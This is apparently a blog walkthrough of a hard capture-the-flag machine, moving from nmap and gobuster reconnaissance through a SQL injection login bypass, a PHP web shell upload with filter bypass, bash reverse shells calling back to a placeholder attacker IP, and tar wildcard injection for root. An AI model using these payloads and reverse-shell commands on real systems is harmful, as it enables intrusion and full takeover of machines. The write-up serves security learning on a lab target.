Hard CTF Walkthrough: Complete Guide to Root a Machine (Recon → Exploit → Privilege Escalation)

🧠 Introduction

Capture The Flag (CTF) challenges are one of the best ways to learn real-world cybersecurity and ethical hacking skills. Unlike theoretical learning, CTFs simulate actual vulnerabilities found in production systems.

In this blog, we will go through a complete hard-level CTF machine walkthrough, covering everything from:

• Reconnaissance

• Enumeration

• Exploitation

• Privilege Escalation

• Root Access

This guide is designed for intermediate to advanced learners who want to sharpen their penetration testing mindset.

We’ll be using tools like:

• Nmap

• Gobuster

• Burp Suite

• Netcat

🖥️ Machine Overview

• Difficulty: Hard

• Target IP: 10.10.10.50

• OS: Linux

• Goal: Capture user.txt and root.txt

🔍 Step 1: Reconnaissance

Reconnaissance is the foundation of any successful attack.

🔎 Nmap Scan

nmap -sC -sV -p- -T4 10.10.10.50

📊 Results:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2
80/tcp   open  http    Apache 2.4.41
443/tcp  open  https   Apache SSL

👉 Key Observations:

• SSH is open (possible brute-force or key-based access)

• Web server running (main attack surface)

🌐 Step 2: Web Enumeration

🔎 Visit Website

Open browser:

http://10.10.10.50

👉 You’ll notice:

• Login panel

• Hidden directories possible

📂 Directory Bruteforce

gobuster dir -u http://10.10.10.50 -w /usr/share/wordlists/dirb/common.txt

📊 Found:

/admin
/uploads
/api

🔐 Step 3: Login Bypass (Initial Access)

🔎 Intercept Request with Burp Suite

• Capture login request

• Send to Repeater

Try payload:

' OR 1=1 --

👉 Result:
✅ Login successful (SQL Injection)

📁 Step 4: File Upload Exploit

Inside /admin, we find file upload functionality.

🔥 Goal:

Upload a reverse shell

🧾 Create PHP Shell

<?php system($_GET['cmd']); ?>

🚫 Problem:

Upload blocked for .php

💡 Bypass Trick:

Rename file:

shell.php.jpg

OR

Use:

shell.phtml

👉 Upload successful!

💻 Step 5: Gain Reverse Shell

🖥️ Start Listener

nc -lvnp 4444

🌐 Trigger Shell

http://10.10.10.50/uploads/shell.phtml?cmd=bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'

👉 Result:
✅ Reverse shell obtained

🔧 Step 6: Stabilize Shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

export TERM=xterm

🧪 Step 7: Enumeration (Post Exploitation)

Now we dig deeper.

🔎 Check users:

cat /etc/passwd

👉 Found:

user1
developer
root

🔎 Check SUID binaries:

find / -perm -4000 -type f 2>/dev/null

👉 Found unusual binary:

/usr/bin/custom-backup

⚠️ Step 8: Privilege Escalation (Critical)

Run binary:

/usr/bin/custom-backup

👉 Output:

Backup completed using tar

💡 Exploit Idea:

Tar wildcard injection

🧨 Create malicious file:

echo 'bash -i >& /dev/tcp/YOUR_IP/5555 0>&1' > shell.sh
chmod +x shell.sh

🎯 Exploit:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

🖥️ Start Listener:

nc -lvnp 5555

🚀 Run binary again:

/usr/bin/custom-backup

👉 Result:
🔥 ROOT SHELL OBTAINED

👑 Step 9: Capture Flags

🧾 User Flag:

cat /home/user1/user.txt

🧾 Root Flag:

cat /root/root.txt

🧠 Step 10: Key Learnings

This hard machine teaches critical concepts:

🔥 1. SQL Injection

Login bypass using simple payload

🔥 2. File Upload Vulnerability

Bypassing extension filters

🔥 3. Reverse Shell

Gaining initial access

🔥 4. Privilege Escalation

Using tar wildcard injection

⚡ Pro Tips for Hard CTFs

• Always enumerate deeply

• Don’t trust file filters

• Look for custom binaries

• Think creatively (not just tools)

• Read error messages carefully

🚀 Conclusion

This walkthrough demonstrated how a real attacker approaches a system:

👉 Start with recon
👉 Find weak entry point
👉 Gain foothold
👉 Escalate privileges
👉 Take full control

Hard-level CTF machines are not about tools — they are about mindset and persistence.